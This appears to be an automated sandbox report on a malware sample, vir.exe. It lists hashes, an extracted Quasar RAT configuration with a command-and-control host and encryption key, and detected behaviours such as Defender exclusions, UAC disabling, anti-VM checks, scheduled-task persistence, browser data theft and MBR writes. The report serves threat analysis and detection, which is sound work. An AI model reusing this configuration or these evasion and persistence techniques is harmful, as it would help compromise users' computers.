Analysis
-
max time kernel
152s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 02:05
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240508-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023454-236.dat family_umbral -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023450-229.dat family_quasar behavioral2/memory/7036-3462-0x00000000009E0000-0x0000000000D04000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exe = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 76 5376 mshta.exe 76 5376 mshta.exe 76 5376 mshta.exe 221 5152 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3612 powershell.exe 5624 powershell.exe 6056 powershell.exe 4680 powershell.EXE 6524 powershell.exe 4236 powershell.exe 6040 powershell.exe 7020 powershell.exe -
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\04DA7244E777C05AAD5F1EC1A9C51E20890F7B78\Blob = 0f0000000100000014000000fda50fd00fc9f2a00d46408773ae498bcbfdddfd0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000300064006500650063003400320033002d0033003600340038002d0034006200380038002d0061003700620031002d0039006100310063006500630034006500360032003200380000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000003000000010000001400000004da7244e777c05aad5f1ec1a9c51e20890f7b78200000000100000000030000308202fc308201e4a0030201020210102c71ca3dcd4dbd4358a35a0bbcd879300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303533303032303734385a180f32313234303530363032303734385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100c42a7f129975e4ebf5b83dc06003c73e892d0fdc2f07db0207125ccc7e1bbed3d98a8e3554240351e34cc7fdc3438c5b0252e3436347b5ca22f028f735a00e36cc49d084b1c6dd9655bf64a3c9ac8095dd23407e4bc1e9304c0f858f71f76b4e1ae1f274d9d51aad68ebb13f4fa4ce1d640ba1622d152d72211ddf961b7179fa07b7a66fdc9d0b0156a656b31b94afdc832aaff6f0f85a8aa08308057db5676238c8cb898d48b2ec97b5a3c24d57a507914cfefcf1397a3d6ead2b70ba6ac53181d3669f2624b841b222714455e99519996c1b3684c6de6df274292507c83a49f2e18ee059c997884e6e26486450e04e0150941bc8b6556271fbb5154de8b6c90203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4052494a544f4f56580030090603551d1304023000300d06092a864886f70d01010505000382010100ba2133b7895e19d9eeeee4c9feb579c8b0b8f6df1df19ee86fac0aecf08078a0e7fd11d772d664ee152c0da8694013845e41ac34cf6ea5a77458614e7872e743fcc9ec69cc7f846e017ab48247fc96f8e4feadf1181a1df97b611f9f25c134215f3f0f3bfa127edeb40cb2e9b237fd962b5fe15306ee8ea44de16451178ff53d0c2585f399c96f71a6fdab4f068acbe4c13c121da8e76eface973bdf8a9e59e6dbb2a4bc8d2a54041c68a588198e740dcff30d4732e653579c163953e35341b1ca5c96aa1b4dbb8cc377037141055aa90d6155c690f224a6d77cfd2f3e1962b50271b5d367436d6809790912be2c4d670bfad448f82a5bfc7528134e1fc004c2 msedge.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\04DA7244E777C05AAD5F1EC1A9C51E20890F7B78\Blob = 0f0000000100000014000000fda50fd00fc9f2a00d46408773ae498bcbfdddfd03000000010000001400000004da7244e777c05aad5f1ec1a9c51e20890f7b78200000000100000000030000308202fc308201e4a0030201020210102c71ca3dcd4dbd4358a35a0bbcd879300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303533303032303734385a180f32313234303530363032303734385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100c42a7f129975e4ebf5b83dc06003c73e892d0fdc2f07db0207125ccc7e1bbed3d98a8e3554240351e34cc7fdc3438c5b0252e3436347b5ca22f028f735a00e36cc49d084b1c6dd9655bf64a3c9ac8095dd23407e4bc1e9304c0f858f71f76b4e1ae1f274d9d51aad68ebb13f4fa4ce1d640ba1622d152d72211ddf961b7179fa07b7a66fdc9d0b0156a656b31b94afdc832aaff6f0f85a8aa08308057db5676238c8cb898d48b2ec97b5a3c24d57a507914cfefcf1397a3d6ead2b70ba6ac53181d3669f2624b841b222714455e99519996c1b3684c6de6df274292507c83a49f2e18ee059c997884e6e26486450e04e0150941bc8b6556271fbb5154de8b6c90203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4052494a544f4f56580030090603551d1304023000300d06092a864886f70d01010505000382010100ba2133b7895e19d9eeeee4c9feb579c8b0b8f6df1df19ee86fac0aecf08078a0e7fd11d772d664ee152c0da8694013845e41ac34cf6ea5a77458614e7872e743fcc9ec69cc7f846e017ab48247fc96f8e4feadf1181a1df97b611f9f25c134215f3f0f3bfa127edeb40cb2e9b237fd962b5fe15306ee8ea44de16451178ff53d0c2585f399c96f71a6fdab4f068acbe4c13c121da8e76eface973bdf8a9e59e6dbb2a4bc8d2a54041c68a588198e740dcff30d4732e653579c163953e35341b1ca5c96aa1b4dbb8cc377037141055aa90d6155c690f224a6d77cfd2f3e1962b50271b5d367436d6809790912be2c4d670bfad448f82a5bfc7528134e1fc004c2 msedge.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/856-239-0x0000000005F40000-0x0000000006490000-memory.dmp net_reactor behavioral2/memory/856-247-0x0000000006A40000-0x0000000006F8E000-memory.dmp net_reactor behavioral2/memory/856-263-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-270-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-268-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-276-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-280-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-283-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-289-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-295-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-301-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-299-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-297-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-291-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-330-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-328-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-322-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-320-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-318-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-303-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-293-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-287-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-285-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-279-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-274-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-272-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-266-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-264-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-258-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-256-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-252-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-249-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-260-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-254-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor behavioral2/memory/856-250-0x0000000006A40000-0x0000000006F89000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0ED8kn5cnmOyeZv2DQ8eB5il.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0ED8kn5cnmOyeZv2DQ8eB5il.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation nqhFWmq.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation vir.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vDWfDSUG60QhQISF9CEh2VB4.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk dkFVZlmtLqTxxrtOi9FElXnO.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v2tTc7I7VSfRPTNFBqNDyGMB.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gYtpbCQWIFyMZvbjUH2gwyk.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3MSLElH26oQRmPovp7wq3aD.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qUkvqjFXCVJJjNhfmM7Pi7xB.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bEMS9S95fcgYuKknmfR5fJW5.bat regsvcs.exe -
Executes dropped EXE 21 IoCs
pid Process 1300 ProgressBarSplash.exe 856 Rover.exe 4480 Google.exe 2516 regmess.exe 3024 1.exe 5972 3.exe 6460 WinaeroTweaker-1.40.0.0-setup.exe 6336 WinaeroTweaker-1.40.0.0-setup.tmp 7036 scary.exe 6696 the.exe 5788 wimloader.dll 6592 Romilyaa.exe 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 7060 0ED8kn5cnmOyeZv2DQ8eB5il.exe 2652 dkFVZlmtLqTxxrtOi9FElXnO.exe 6024 eLOyJkYRBZrXsLNa5scWY7nr.exe 6568 Install.exe 6452 Install.exe 3900 Install.exe 2880 nqhFWmq.exe -
Loads dropped DLL 6 IoCs
pid Process 3024 1.exe 3024 1.exe 3024 1.exe 6336 WinaeroTweaker-1.40.0.0-setup.tmp 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 5152 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023566-3610.dat themida behavioral2/memory/7060-3616-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/7060-3754-0x0000000140000000-0x000000014159C000-memory.dmp themida -
resource yara_rule behavioral2/files/0x00080000000233c6-214.dat upx behavioral2/memory/5972-3407-0x0000000000BB0000-0x00000000021D7000-memory.dmp upx behavioral2/memory/5972-3455-0x0000000000BB0000-0x00000000021D7000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json nqhFWmq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json nqhFWmq.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 89 pastebin.com 93 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 157 ipinfo.io 154 api.myip.com 155 api.myip.com 156 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 qjnar5mhQPzpks9OpNlu8jqr.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00080000000233c5-123.dat autoit_exe behavioral2/files/0x000d0000000233ad-209.dat autoit_exe behavioral2/files/0x00080000000233cf-218.dat autoit_exe -
Drops file in System32 directory 35 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE nqhFWmq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 nqhFWmq.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 0ED8kn5cnmOyeZv2DQ8eB5il.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nqhFWmq.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 0ED8kn5cnmOyeZv2DQ8eB5il.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 nqhFWmq.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nqhFWmq.exe File opened for modification C:\Windows\System32\GroupPolicy 0ED8kn5cnmOyeZv2DQ8eB5il.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 nqhFWmq.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 0ED8kn5cnmOyeZv2DQ8eB5il.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 nqhFWmq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nqhFWmq.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 7060 0ED8kn5cnmOyeZv2DQ8eB5il.exe 7060 0ED8kn5cnmOyeZv2DQ8eB5il.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 7020 set thread context of 6200 7020 powershell.exe 196 PID 4912 set thread context of 4772 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 231 -
Drops file in Program Files directory 34 IoCs
description ioc Process File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-RSQQA.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nqhFWmq.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\JipyTrDkU\DXMumWU.xml nqhFWmq.exe File created C:\Program Files\Winaero Tweaker\is-JDL16.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-3066P.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi nqhFWmq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja nqhFWmq.exe File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nqhFWmq.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-OQGC7.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-CD0QS.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-SMHBK.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\ChdANwY.dll nqhFWmq.exe File created C:\Program Files (x86)\tegRANPZONsU2\OWlKdvP.xml nqhFWmq.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\OgCXTDR.dll nqhFWmq.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-4TU4V.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\JipyTrDkU\WlzzPF.dll nqhFWmq.exe File created C:\Program Files (x86)\tegRANPZONsU2\QWhlhzqzJPQFU.dll nqhFWmq.exe File created C:\Program Files\Winaero Tweaker\is-MFFGD.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-0FII9.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\dOdgGqZ.xml nqhFWmq.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\HeBupxH.xml nqhFWmq.exe File created C:\Program Files\Winaero Tweaker\is-JHNDB.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi nqhFWmq.exe File created C:\Program Files (x86)\nFLFFjqrQPUn\ukfQNsv.dll nqhFWmq.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job schtasks.exe File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job schtasks.exe File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job schtasks.exe File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 6492 5972 WerFault.exe 159 2960 3900 WerFault.exe 244 5188 6452 WerFault.exe 209 1844 2880 WerFault.exe 336 -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4476 schtasks.exe 6848 schtasks.exe 7148 schtasks.exe 6888 schtasks.exe 5232 schtasks.exe 5240 schtasks.exe 5876 schtasks.exe 2220 schtasks.exe 5416 schtasks.exe 6160 schtasks.exe 5188 schtasks.exe 1844 schtasks.exe 5300 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4548 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5044 tasklist.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
